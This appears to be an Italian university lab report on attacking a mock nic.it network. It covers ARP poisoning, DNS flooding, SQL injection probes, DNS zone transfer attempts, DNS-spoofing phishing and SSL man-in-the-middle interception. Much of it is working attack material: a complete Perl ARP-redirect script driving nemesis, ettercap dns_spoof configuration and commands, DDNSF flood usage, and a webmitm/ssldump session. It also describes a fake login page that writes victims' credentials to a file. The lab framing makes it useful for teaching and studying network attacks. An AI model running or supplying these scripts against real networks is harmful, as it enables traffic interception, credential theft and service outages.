9 Monitoraggio di X11 (porta 6000 e seguenti)

10 Monitoraggio degli handle dei file NFS

11 Monitoraggio di SMTP (porta 25)

12 Monitoraggio di http (porta 80)

DOS

Un attacco DoS (Denial of service, negazione del servizio) avviene quando la disponibilità delle risorse viene

intenzionalmente bloccata o ridotta in modo illecito, in altre parole quando tale disponibilità viene negata

agli utenti autorizzati. Questi tipi di violazione possono essere eseguiti sul sistema locale oppure in modo

remoto da una rete.

FLOODING

Se l'obiettivo è un host, un server o un apparato di rete, il flooder - tramite l'invio di un gran

numero di pacchetti ad una grande velocità sfruttando protocolli come ad esempio Syn o ICMP -

potrebbe rendere non disponibile il servizio svolto dal dispositivo a causa dell'impossibilità di questi

di gestire la grande quantità di pacchetti ricevuti creando quindi un momentaneo crash del servizio

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

20

per la durata del flood o un denial of service fino a rendere il dispositivo non più in grado di erogare

i servizi.

SNIFFING ATTIVO/ SPOOFING / CACHE POISON

In un ambiente a rete commutata i pacchetti vengono inviati unicamente alla porta alla porta a cui sono

destinati, in base ai rispettivi indirizzi MAC di destinazione. Il vantaggio in un ambiente commutato sta nel

fatto che alle periferiche vengono inviati unicamente i pacchetti ad esse destinati, per cui i dispositivi

promiscui non sono in grado di eseguire lo sniffing di altri pacchetti. Ma anche in un ambiente commutato

vi sono modi astuti per eseguire lo sniffing di pacchetti dalle altre periferiche ; C’è un aspetto importante

delle comunicazioni di rete che può essere manipolato per ottenere effetti interessanti: L’indirizzo di

origine. Questi protocolli non consentono in alcun modo di verificare che l’indirizzo di origine presente in

un pacchetto sia realmente l’indirizzo della macchina di origine. La tecnica di camuffamento di un indirizzo

di origine in un pacchetto è nota come spoofing. In una prima fase, lo spoofing consiste nell’ascolto dei

pacchetti in transito su una rete commutata. Gli altri due dettagli interessanti riguardano l’ARP. Per prima

cosa, quando arriva una risposta ARP con un indirizzo IP già esistente nella cache ARP, il sistema ricevente

scrive le nuove informazioni presenti nella risposta cancellando le precedenti informazioni sugli indirizzi

MAC. Il secondo punto interessante è che i sistemi accetteranno una risposta ARP anche se non hanno

inviato una richiesta ARP. Ciò in quanto le informazioni di stato sul traffico ARP non vengono conservate,

perché ciò richiederebbe un’ulteriore quantità di memoria e renderebbe più complesso un protocollo

progettato per essere improntato alla massima semplicità. Questi tre dettagli, quando vengono sfruttati in

modo appropriato, possono consentire a un aggressore di sniffare il traffico di rete su una rete commutata

mediante la cosiddetta tecnica del reindirizzamento ARP.

L’aggressore invia risposte ARP camuffate a determinate periferiche, facendo in modo che le voci della

cache ARP vengano sovrascritte con i suoi dati. Questa tecnica viene detta “avvelenamento della cache

ARP” (ARP Cache Poisoning). Per intercettare il traffico di rete tra due punti, A e B, l’aggressore deve

“avvelenare” la cache ARP di A per far si che l’indirizzo IP di B corrisponda al suo indirizzo MAC, e deve

inoltre avvelenare a cache ARP di B per indurre B a ritenere che l’indirizzo IP di A corrisponda anch’esso al

suo indirizzo MAC. A questo punto è sufficiente che la macchina dell’aggressore inoltri questi pacchetti alle

rispettive destinazioni finali: tutto il traffico tra A e B continuerà a funzionare regolarmente, ma passando

attraverso la macchina dell’aggressore, come mostrato nella seguente figura.

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

21

Poiché A e B incapsulano le rispettive intestazioni Ethernet dei pacchetti sulla base delle rispettive cache

ARP, il traffico IP di A destinato a B viene in realtà inviato all’indirizzo MAC dell’aggressore, e viceversa. Lo

switch filtra il traffico basandosi unicamente sull’indirizzo MAC; pertanto esso funzionerà come previsto,

inoltrando il traffico IP di A a B, destinato all’indirizzo MAC dell’aggressore, alla porta dello stesso. Lo switch

funziona correttamente ; sono le macchine bersagliate a essere ingannate e costrette a reindirizzare il loro

traffico alla macchina dell’aggressore.

DIROTTAMENTO RST

Una forma molto semplice di dirottamento TCP/IP (in realtà un attacco DoS) implica l’iniezione di un

pacchetto di reset (RST) che sembra autentico. Se l’origine è camuffata e il numero di acknowlegment è

corretto, la parte ricevente riterrà che il mittente abbia effettivamente inviato il pacchetto di reset e

resetterà la connessione. Tale risultato può essere ottenuto con tcpdump, awk e un tool di iniezione di

pacchetti a riga di comando come nemesis.

Tcpdump –S –n –e –l “tcp*13+ & 16 == 16”

MITM

Questa strategia si applica ai protocolli crittografici. L'aggressore imposta un server che risponde alle

richieste dei client. Per esempio, si supponga che il server risponda ad una richiesta per https://www.nic.it:

un utente che contatta questa macchina crede erroneamente di essere in contatto con nic.it. Nello stesso

momento, l'aggressore contatta il vero nic.it fingendo di essere l'utente in questione. Il cracker recita così

entrambi i ruoli: decodifica i dati in arrivo dall'utente e li codifica nuovamente per trasmetterli alla

destinazione originaria. In teoria i protocolli crittografati possiedono difese contro questa attività: un server

che afferma di essere nic.it deve anche provarlo. In pratica, però, gran parte degli utenti ignora questo fatto

e gli attacchi MITM si sono dimostrati efficaci quando utilizzati sul campo.

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

22

SQL INJECTION

La SQL injection è una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un

database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce

codice maligno all'interno di una query SQL. Le conseguenze prodotte sono imprevedibili per il

programmatore: l'Sql Injection permette al malintezionato di autenticarsi con ampi privilegi in aree

protette del sito (ovviamente, anche senza essere in possesso delle credenziali d'accesso) e di visualizzare

e/o alterare dati sensibili

Cap

ito

lo: P

arte

sec

on

da:

PR

EREQ

UIS

ITI

23

STRUMENTI SOFTWARE

Sqlmap Strumento automatico per attacchi di sql injection.

ddnsf.tar ATTACCO DoS flodding

Un potente attacco contro i server DNS. DDNSF manda

tante query fino a rendere il servizio di DNS

inutilizzabile.

Se il software demone del DNS fa il log delle query

incorrette (come molti fanno), gli effetti saranno più

grandi.

arpredirect.pl Uno script perl costruito ad hoc che si basa sulle

funzionalità offerte da nemesis che permette di fare

arp spoofing ma per questo come vedremo

successivamente avremo anche potuto usate le

potenzialità del tool Ettercap che si presta a meraviglia

per attacchi di tipo MITM.

Ettercap

E’ suite per attacchi man in the middle su LAN. E una

soluzione modulare che sfrutta i plugin per l’aggiunta

di nuovi tipologie di attacchi.

Wireshark Sniffer.

Nemesis Tool di iniezione di pacchetti ARP camuffati

Nikto Nikto è un web server scanner che permette di

effettuare una moltitudine di test (di sicurezza

ovviamente) su servizi web di varia natura e vendor.

Ad oggi include qualcosa come 3500 scansioni verso

file e CGI probabilisticamente dannosi, riesce a

ricavare la tipologia di servizio e la versione di altre

900 daemon server testando 250 vulnerabilità

specifiche per ciascuno di essi.

Nessus Nessus è un programma open source rilasciato in

licenza GPL di tipo client-server che tramite lo scan e

l'abilitazione di plugin appositamente configurabili a

seconda della tipologia di host e vulnerabilità che si

andrà ad analizzare, rileva le vulnerabilità presenti

suggerendo le possibili soluzioni creando report di

facile analisi in vari formati (HTML , pdf, etc etc).

Tutt'ora Nessus con le sue tante opzioni per la

scansione , la possibilità di scrivere plugin e per il tipo

di reportistica prodotta rimane uno dei migliori

strumenti per vulnerability assessment.

http://it.wikipedia.org/wiki/Open_source

http://it.wikipedia.org/wiki/GNU_General_Public_License

http://it.wikipedia.org/wiki/Client-server

http://it.wikipedia.org/wiki/Port_Scanning

http://it.wikipedia.org/wiki/Plugin_%28informatica%29

http://it.wikipedia.org/wiki/Host

http://it.wikipedia.org/wiki/Report_informativo

http://it.wikipedia.org/wiki/Html

http://it.wikipedia.org/wiki/Pdf

http://it.wikipedia.org/wiki/Port_Scanning

http://it.wikipedia.org/wiki/Plugin_%28informatica%29

http://it.wikipedia.org/w/index.php?title=Vulnerability_assessment&action=edit&redlink=1

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

24

PARTE TERZA: ATTACCHI ED ESITI

ATTACCO 1 : SQL INJECTION

ESITO 1 : SQL INJECTION (FAILED)

L’attacco non è praticabile perché la validazione è fatta lato server e gli input dati dall’utente sono stati

filtrati tramite espressioni regolari che escludono il carattere apice, doppia apice e altri caratteri che invece

avrebbero permesso questo tipo di attacco.

[root@localhost sqlmap]# python ./sqlmap.py -u https://www.nic.it/check_login.php --method=POST

--data="userid=1&pwd=1"

sqlmap/0.5 coded by inquis [email protected]

and belch <[email protected]>

[*] starting at: 15:23:46

[15:23:48] [WARNING] POST parameter 'pwd' is not dynamic

[15:23:49] [WARNING] POST parameter 'userid' is not dynamic

[15:23:49] [ERROR] all parameters are not injectable

[root@localhost sqlmap]# python ./sqlmap.py -u https://www.nic.it/whois.php --method=POST --

data="whois=camail.it" -v 1

sqlmap/0.5 coded by inquis [email protected]

and belch <[email protected]>

[*] starting at: 15:29:01

[15:30:01] [INFO] testing if the url is stable, wait a few seconds

[15:33:03] [INFO] url is stable

[15:33:03] [INFO] testing if POST parameter 'whois' is dynamic

[15:33:03] [INFO] confirming that POST parameter 'whois' is dynamic

[15:33:03] [INFO] POST parameter 'whois' is dynamic

[15:33:03] [INFO] testing sql injection on POST parameter 'whois'

[15:33:03] [INFO] testing numeric/unescaped injection on POST parameter 'whois'

[15:33:04] [INFO] POST parameter 'whois' is not numeric/unescaped injectable

[15:33:04] [INFO] testing string/single quote injection on POST parameter 'whois'

[15:33:04] [INFO] POST parameter 'whois' is not string/single quote injectable

[15:33:04] [INFO] testing string/double quotes injection on POST parameter 'whois'

[15:33:04] [INFO] POST parameter 'whois' is not string/double quotes injectable

[15:33:04] [WARNING] POST parameter 'whois' is not injectable

[15:33:04] [ERROR] 'NoneType' object is not iterable

[*] shutting down at: 15:33:04

[*] shutting down at: 15:23:49

mailto:[email protected]

mailto:[email protected]

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

25

ATTACCO 2 : DOS 1 (NEGAZIONE DI ACCESSO AL SERVIZIO DNS)

Mostriamo per prima cosa il codice di arpredirect.pl che ci servirà per questo tipo di attacco. Reperisce le

informazioni della vittima e tramite nemesis infetta la loro cache arp.

#!/usr/bin/perl

$device = "eth0";

$SIG{INT} = \&cleanup; # trappola per ctrl-C e invio a cleanup

$flag = 1;

$gw = shift; # primo arg della riga di comando

$targ = shift; #secondo arg della riga di

comando

if (($gw . "." . $targ) !~ /^([0-9]{1,3}\.){7}[0-9]{1,3}$/)

{

#effettua validazione input; se non valido, esci.

die("USAGE: ARPREDIRECT.PL <GATEWAY> <target>\n");

}

#Invia rapidamente ping a ogni detinazione per inserire indirizzi mac nella

cache

print "Ping di $gw e $targ per recuperare indirizzi MAC...\n";

system("ping -q -c 1 -w 1 $gw > /dev/null");

system("ping -q -c 1 -w 1 $targ > /dev/null");

#estrai questi indirizzi da cache arp

print "Recupero indirizzi MAC da cache arp....\n";

$gw_mac = qx[/sbin/arp -na $gw];

$gw_mac = substr($gw_mac, index($gw_mac, ":")-2, 17);

$targ_mac = qx[/sbin/arp -na $targ];

$targ_mac = substr($targ_mac, index($targ_mac, ":")-2, 17);

# se non ci sono entrambi, esci.

if ($gw_mac !~ /^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/){

die("MAC address of $gw not found.\n");

}

# se non ci sono entrambi, esci.

if ($targ_mac !~ /^([A-F0-9]{2}\:){5}[A-F0-9]{2}$/){

die("MAC address of $targ not found.\n");

}

#ACQUISISCI IL TUO IP E MAC

print "Recupero info del tuo IP e MAC da ifconfig...\n";

@ifconf = split(" ", qx[/sbin/ifconfig $device]);

$me = substr(@ifconf[6],5);

$me_mac = @ifconf[4];

print "[*] Gateway : $gw is at $gw_mac\n";

print "[*] Target : $targ is at $targ_mac\n";

print "[*] You : $me is at $me_mac\n";

while ($flag)

{

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

26

#Continua ad avvelenare la fino a cntrl-C

print "Reindirizzamento: $gw -> $me_mac <- $targ";

system ("nemesis arp -r -d $device -S $gw -D $targ -h $me_mac -m $targ_mac

-H $me_mac -M $targ_mac");

system ("nemesis arp -r -d $device -S $targ -D $gw -h $me_mac -m $gw_mac -

H $me_mac -M $gw_mac");

sleep 10;

}

sub cleanup

{

#RIPRISTINA SITUAZIONE NORMALE

$flag = 0;

print "Cntrl-C captato, uscita in modo ortodosso.\nRispristino situazione

normale della cache arp.";

system ("nemesis arp -r -d $device -S $gw -D $targ -h $gw_mac -m $targ_mac

-H $gw_mac -M $targ_mac");

system ("nemesis arp -r -d $device -S $targ -D $gw -h $targ_mac -m $gw_mac

-H $targ_mac -M $gw_mac");

}

ADESSO LANCIAMO QUESTO SCRIPT :

[root@localhost SPOOFING]# ./arpredirect.pl 192.168.0.2 192.168.0.5

Ping di 192.168.0.2 e 192.168.0.5 per recuperare indirizzi MAC...

Recupero indirizzi MAC da cache arp....

Recupero info del tuo IP e MAC da ifconfig...

[*] Gateway : 192.168.0.2 is at 00:50:BA:C7:CC:A1

[*] Target : 192.168.0.5 is at 00:00:E8:7D:7F:65

[*] You : 192.168.0.67 is at 00:1B:38:AA:21:26

Reindirizzamento: 192.168.0.2 -> 00:1B:38:AA:21:26 <- 192.168.0.5

ARP Packet Injected

ARP Packet Injected


ARP Packet Injected

ARP Packet Injected


ARP Packet Injected

ARP Packet Injected

……………………….

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

27

Quello che si fa in questo attacco è che il malintenzionato (192.168.0.67) finge di essere la macchina

192.168.0.2 (SPOFFING) che offre un servizio DNS e la vittima 192.168.0.5 pensando di collegarsi al servizio

DNS chiederà in maniera inconsapevole al malintenzionato di usufruire dei servizi offerti da 192.168.0.2.

Il malintenzionato in questo modo precluderà l’accesso alla rete alla macchina 192.168.0.5.

Una cosa che si potrebbe fare e lo vedremo nei prossimi attacchi è quello di configurare la macchina del

malintenzionato 192.168.0.67 come DNS secondario per cercare di rimpiazzare il servizio legittimo di

192.168.0.2.

ESITO2 : DOS 1 (SUCCESS)

Preclude l’accesso alla rete alla macchina vittima 192.168.0.5

ATTACCO 3 : DDOS 2 (DEGRADAZIONE DEL SERVIZIO DNS – ATTACCO FLODDING DISTRIBUITO)

Questo programma già fatto è reperibile su http://packetstormsecurity.com

ESITO 3: DDOS 2 (SUCCESS)

L’effetto ottenuto è il degrado graduale delle prestazioni del server DNS e l’effetto diventa più grande

installando DDNSF_server su quante più macchine è possibile.

[root@localhost ddnsf]# ./DDNSF_server &

[5] 24712

[root@localhost ddnsf]# ./DDNSF_client start zombie.txt 192.168.0.2

Distributed DNS Floder v0.1b by Extirpater

Sending request to 192.168.0.67

Sending request to 192.168.0.5

http://packetstormsecurity.com/

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

28

ATTACCHI SPECIFICI AL DNS

ATTACCO 1 : TENTATIVO DI TRASFERIMENTO DELLE ZONE DEL DNS

Questo attacco è inteso per sostituire in maniera completa il server DNS legittimo.

Per prima cosa ho installato BIND per il servizio di naming e configurato la mia macchina come un DNS

secondario . Il file named.conf è il seguente :

A questo punto faccio partire il servizio: /etc/rc.d/named restart

options {

directory "/var/named";

pid-file "/var/run/named/named.pid";

auth-nxdomain yes;

datasize default;

allow-recursion { 127.0.0.1;192.168.0.67; };

};

zone "." IN {

type hint;

file "root.hint";

};

zone "nic.it" {

type slave;

file "nic.zone";

masters {

192.168.0.2;

};

allow-query { any; };

allow-transfer { any; };

};

logging {

channel xfer-log {

file "/var/log/named.log";

print-category yes;

print-severity yes;

print-time yes;

severity info;

};

category xfer-in { xfer-log; };

category xfer-out { xfer-log; };

category notify { xfer-log; };

};

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

29

ESITO 1 : TENTATIVO DI TRASFERIMENTO DELLE ZONE DEL DNS (FAILED)

In nic.zone vengono salvate le seguenti informazioni

Notiamo che in error.log ci sono queste informazioni

E in named.log :

Dai file di log scopriamo che non si riescono a scaricare le informazioni riguardanti le zone memorizzate nel

DNS e il database delle zone contenute in NIC è vuoto.

Si presume che gli amministratori del NIC abbiano configurato il loro servizio DNS in modo da non

permettere il trasferimento di zone.

Ho cercato di trasferire le zone anche tramite le utilities di BIND ma il risultato è stato NOAUTH e transfert

failed.

$ORIGIN .

$TTL 86400 ; 1 day

nic.it IN SOA nic.it. root.nic.it. (

2008052731 ; serial

43200 ; refresh (12 hours)

3600 ; retry (1 hour)

1209600 ; expire (2 weeks)

3600 ; minimum (1 hour)

)

NS ns.nic.it.

A 192.168.0.2

$ORIGIN nic.it.

linux A 192.168.0.2

ns A 192.168.0.2

whois A 192.168.0.2

www A 192.168.0.2

Jun 25 19:57:49 localhost named[5861]: zone nic.it/IN: has 0 SOA records

Jun 25 19:57:49 localhost named[5861]: zone nic.it/IN: has no NS records

[root@localhost angelo]# host -lv -t any www.nic.it

Trying "www.nic.it"

; Transfer failed.

Trying "www.nic.it"

Host www.nic.it not found: 9(NOTAUTH)

; Transfer failed.

25-Jun-2008 19:58:43.783 xfer-in: error: transfer of 'nic.it/IN' from

192.168.0.2#53: failed while receiving responses: REFUSED

25-Jun-2008 19:58:43.783 xfer-in: info: transfer of 'nic.it/IN' from

192.168.0.2#53: end of transfer

25-Jun-2008 19:58:45.204 notify: info: zone nic.it/IN: sending notifies

(serial 2008052731)

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

30

[root@localhost angelo]# host -lv -t any nic.it

Trying "nic.it"

; Transfer failed.

Trying "nic.it"

Host nic.it not found: 5(REFUSED)

; Transfer failed.

[root@localhost angelo]# dig [email protected] nic.it axfr

; <<>> DiG 9.4.2 <<>> [email protected] nic.it axfr

;; global options: printcmd

;; Got answer:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1141

;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 0

;; WARNING: recursion requested but not available

;; QUESTION SECTION:

;192.168.0.2\@nic.it. IN A

;; AUTHORITY SECTION:

. 518400 IN NS A.ROOT-SERVERS.NET.

. 518400 IN NS B.ROOT-SERVERS.NET.

. 518400 IN NS C.ROOT-SERVERS.NET.

. 518400 IN NS D.ROOT-SERVERS.NET.

. 518400 IN NS E.ROOT-SERVERS.NET.

. 518400 IN NS F.ROOT-SERVERS.NET.

. 518400 IN NS G.ROOT-SERVERS.NET.

. 518400 IN NS H.ROOT-SERVERS.NET.

. 518400 IN NS I.ROOT-SERVERS.NET.

. 518400 IN NS J.ROOT-SERVERS.NET.

. 518400 IN NS K.ROOT-SERVERS.NET.

. 518400 IN NS L.ROOT-SERVERS.NET.

. 518400 IN NS M.ROOT-SERVERS.NET.

;; Query time: 2 msec

;; SERVER: 192.168.0.2#53(192.168.0.2)

;; WHEN: Thu Jun 26 15:37:26 2008

;; MSG SIZE rcvd: 247

nic.it. 86400 IN SOA nic.it. root.nic.it.

2008052731 43200 3600 1209600 3600

nic.it. 86400 IN NS ns.nic.it.

nic.it. 86400 IN A 192.168.0.2

linux.nic.it. 86400 IN A 192.168.0.2

ns.nic.it. 86400 IN A 192.168.0.2

whois.nic.it. 86400 IN A 192.168.0.2

www.nic.it. 86400 IN A 192.168.0.2

nic.it. 86400 IN SOA nic.it. root.nic.it.

2008052731 43200 3600 1209600 3600

;; Query time: 0 msec

;; SERVER: 127.0.0.1#53(127.0.0.1)

;; WHEN: Thu Jun 26 15:37:26 2008

;; XFR size: 8 records (messages 1, bytes 214)

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

31

ATTACCO 2 : MITM + DNS SPOOFING PHISHING

L’attacco è rivolto a tutte le macchine della sottorete che vorranno accedere a www.nic.it.

Questo attacco consiste nel redirezionare la richiesta delle vittime vorrebbero accedere al sito www.nic.it,

ad un sito maligno contenuto sulla macchina dell’attaccante (in questo caso 192.168.0.67).

Bisogna per prima cosa modificare il file etter.dns in modo da ridirezionare in questo le richieste fatte per

www.nic.it all’indirizzo ip del malintenzionato che avrà installato sulla sua macchina un web server che

presenterà una pagina web uguale a quella del sito che si vorrebbe visitare.

nic.it A 192.168.0.67

*.nic.it A 192.168.0.67

www.nic.it PTR 192.168.0.67 # Wildcards in PTR are not allowed

##########################################

# no one out there can have our domains...

#

www.alor.org A 127.0.0.1

www.naga.org A 127.0.0.1

###############################################

# one day we will have our ettercap.org domain

#

www.ettercap.org A 127.0.0.1

ettercap.sourceforge.net A 216.136.171.201

###############################################

# some MX examples

#

alor.org MX 127.0.0.1

naga.org MX 127.0.0.1

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

#

LAB-PC* WINS 127.0.0.1

# vim:ts=8:noexpandtab

http://www.nic.it/

http://www.nic.it/

http://www.nic.it/

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

32

[root@localhost angelo]# ettercap -Tq -M arp -P dns_spoof /192.168.0.2/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:1B:38:AA:21:26 192.168.0.67 255.255.255.0

Privileges dropped to UID 0 GID 0...

plugin ec_hunter.so cannot be loaded...

28 plugins

39 protocol dissectors

53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.2 00:1B:38:AA:21:26

GROUP 2 : ANY (all the hosts in the list)

Starting Unified sniffing...

Text only Interface activated...

Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [www.nic.it] spoofed to [192.168.0.67]

Closing text interface...

ARP poisoner deactivated.

RE-ARPing the victims...

Unified sniffing was stopped.

ESITO 2 : MITM + DNS SPOOFING PHISHING (SUCCESS)

Questo attacco è risultato vincente perché le persone credendo di aver avuto accesso al servizio legale,

inseriranno le proprie credenziali di accesso nel campo login, e la pagina check_login.php del

malintenzionato, che verrà richiamato nel momento del submit delle informazioni, contiene codice php che

prende i dati inseriti dall’utente e li scrive in un file e in modo comodo l’attaccante avrà le credenziali di

accesso dei poveri malcapitati .

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

33

ATTACCO 3 : MITM + ARP POISON SSL HACKING

Quando un client normalmente accede ad una pagina web usando HTTPS, il client e il server creano un

tunnel cifrato SSL attraverso il quale passato il dati HTTP . Se il traffico è catturato da una terza parte , i

dati che riceverà saranno illeggibili. (In condizioni normali ). Qui di seguito mostriamo una versione di

come un tunnel SSL è creato.

1. Il browser del client richiede una pagina web sicura.

2. Il web server invia il certificato del sito web al browser

3. Il browser valuta la validità del certificato

4. Se il certificato è valido, il browser genera una chiave di sessione, e la cifra con la chiave pubblica

del certificato server, e lo invia al server.

5. Il server decifra la chiave della sessione

6. Entrambe le parti usano la chiave simmetrica della sessione per cifrare la comunicazione http

La validità del certificato dipende da tre cose :

1. Il certificato deve essere firmato da una autorità di certificazione fidata, come Verisign.

2. Il certificato non deve aver passato il suo tempo di scadenza.

3. Il nome dell’host nel certificato deve fare match con il nome del sito web che il browser aspetta di

mostrare.

Se una di queste tre condizioni viene violata il browser, mostra una dialog box che spiega l‘errore, e chiede

il permesso all’utente di continuare a stabilire la sessione SSL usando il certificato in questo caso sospetto.

Generalmente le persone non ci fanno nemmeno caso a questi messaggi come succede con la nostra

piattaforma Rp platform che ci dice che il certificato non è valido e il browser ci consiglia di non

continuare . Quindi questo tipo di attacco avrà sicuramente successo dipende anche dall’esperienza e

prudenza del navigatore di non accettare un certificato sospetto.

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

34

Dopo l’infettazione della cache ARP il computer della vittima e il gateway, ettercap riuscirà ad intercettare

le richieste SSL della vittima, e presenterà al browser della vittima un falso certificato. Se la vittima accetta

il certificato non valido, ettercap stabilisce un tunnel SSL dalla vittima a se stesso, mascherandosi come un

web server sicuro. Poi stabilisce un secondo tunnel SSL al web server reale, presentandosi come un client

SSL. A questo punto l’attaccante potrà decriptare il traffico HTTPS della vittima, e poi inviarlo di nuovo

cifrato al vero web server.

I tool necessari sono :

ssldump : che va a decriptare i dati sniffati ssl usando il nostro certificato falso che abbiamo

spacciato per quello della vittima.

Webmitm : genera un certificato che verrà spacciato per quello della vittima e sarà usato per

instaurare il tunnel ssl con la destinazione. Fa da proxy e sniffa traffico HTTP / HTTPS .

Ettercap : tool per attacchi generici specializzato per attacchi MITM usato in questo caso per

infettare la cache arp delle macchine vittime

[root@localhost]# ssldump

New TCP connection #116: 192.168.0.42(58836) <-> 192.168.0.2(443)

New TCP connection #117: 192.168.0.67(47554) <-> 192.168.0.2(443)

116 1 0.0010 (0.0010) C>S SSLv2 compatible client hello

Version 3.0

cipher suites

SSL2_CK_RC4

SSL2_CK_RC2

SSL2_CK_3DES

SSL2_CK_DES

SSL2_CK_RC4_EXPORT40


Unknown value 0x39

Unknown value 0x38

Unknown value 0x35

Unknown value 0x33

Unknown value 0x32

SSL_RSA_WITH_RC4_128_MD5

SSL_RSA_WITH_RC4_128_SHA

Unknown value 0x2f

SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

Unknown value 0xfeff

SSL_RSA_WITH_3DES_EDE_CBC_SHA

SSL_DHE_RSA_WITH_DES_CBC_SHA

SSL_DHE_DSS_WITH_DES_CBC_SHA

Unknown value 0xfefe

SSL_RSA_WITH_DES_CBC_SHA

SSL_RSA_EXPORT1024_WITH_RC4_56_SHA

SSL_RSA_EXPORT1024_WITH_DES_CBC_SHA

SSL_RSA_EXPORT_WITH_RC4_40_MD5

SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

117 1 0.0501 (0.0501) C>S SSLv2 compatible client hello

Version 3.1

cipher suites

Unknown value 0x39

Unknown value 0x38

Unknown value 0x35

TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA

TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

35

TLS_RSA_WITH_3DES_EDE_CBC_SHA

SSL2_CK_3DES

Unknown value 0x33

Unknown value 0x32

Unknown value 0x2f

TLS_RSA_WITH_IDEA_CBC_SHA

SSL2_CK_IDEA

SSL2_CK_RC2

TLS_RSA_WITH_RC4_128_SHA

TLS_RSA_WITH_RC4_128_MD5

SSL2_CK_RC4

TLS_DHE_RSA_WITH_DES_CBC_SHA

TLS_DHE_DSS_WITH_DES_CBC_SHA

TLS_RSA_WITH_DES_CBC_SHA

SSL2_CK_DES

TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA

TLS_RSA_EXPORT_WITH_DES40_CBC_SHA

TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5


TLS_RSA_EXPORT_WITH_RC4_40_MD5


117 2 0.1623 (0.1122) S>C Handshake

ServerHello

Version 3.1

session_id[0]=

cipherSuite Unknown value 0x39

compressionMethod NULL

117 3 0.1623 (0.0000) S>C Handshake

Certificate

117 4 0.1623 (0.0000) S>C Handshake

ServerKeyExchange

117 5 0.1623 (0.0000) S>C Handshake

ServerHelloDone

117 6 0.2140 (0.0516) C>S Handshake

ClientKeyExchange

117 7 0.2140 (0.0000) C>S ChangeCipherSpec

117 8 0.2140 (0.0000) C>S Handshake

117 9 0.2472 (0.0332) S>C ChangeCipherSpec

117 10 0.2472 (0.0000) S>C Handshake

116 2 0.2674 (0.2664) S>C Handshake

ServerHello

Version 3.0

session_id[32]=

66 ff 1b d6 23 be 84 50 67 67 48 a7 35 f7 ba ab

7e 27 49 55 38 1e ca bd 8b 78 69 3e c8 01 38 3f

cipherSuite Unknown value 0x35

compressionMethod NULL

116 3 0.2674 (0.0000) S>C Handshake

Certificate

116 4 0.2674 (0.0000) S>C Handshake

ServerHelloDone

116 5.3247 (5.0572) S>C TCP FIN

117 5.3243 (5.0770) C>S TCP FIN

117 11 5.3249 (0.0006) S>C Alert

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

36

[root@localhost home]# webmitm

Generating RSA private key, 1024 bit long modulus

.....++++++

...........................................++++++

e is 65537 (0x10001)

You are about to be asked to enter information that will be incorporated

into your certificate request.

What you are about to enter is what is called a Distinguished Name or a DN.

There are quite a few fields but you can leave some blank

For some fields there will be a default value,

If you enter '.', the field will be left blank.

-----

Country Name (2 letter code) [AU]:it

State or Province Name (full name) [Some-State]:salerno

Locality Name (eg, city) []:unisa

Organization Name (eg, company) [Internet Widgits Pty Ltd]:unisa

Organizational Unit Name (eg, section) []:unisa

Common Name (eg, YOUR name) []:unisa

Email Address []:[email protected]

Please enter the following 'extra' attributes

to be sent with your certificate request

A challenge password []:

An optional company name []:

Signature ok

subject=/C=it/ST=salerno/L=unisa/O=unisa/OU=unisa/CN=unisa/emailAddress=unisa@un

isa.it

Getting Private key

webmitm: certificate generated

webmitm: relaying transparently

Cap

ito

lo: P

arte

ter

za: A

TTA

CC

HI E

D E

SITI

37

COMANDO DA LANCIARE ETTERCAP ettercap -Tq -M arp:remote /$IPgateway/ -P autoadd

[root@localhost angelo]# ettercap -Tq -M arp /192.168.0.2/ // -P autoadd

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> 00:1B:38:AA:21:26 192.168.0.67 255.255.255.0

Privileges dropped to UID 0 GID 0...

28 plugins

39 protocol dissectors

53 ports monitored

7587 mac vendor fingerprint

1698 tcp OS fingerprint

2183 known services

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

3 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.0.2 00:50:BA:C7:CC:A1

